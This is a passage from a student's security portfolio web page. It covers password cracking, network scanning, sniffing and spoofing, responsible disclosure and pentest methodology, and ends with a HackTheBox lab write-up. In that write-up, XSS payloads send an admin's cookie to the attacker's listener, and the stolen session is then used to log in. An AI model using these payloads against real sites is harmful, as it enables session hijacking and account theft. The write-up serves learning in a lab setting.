          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
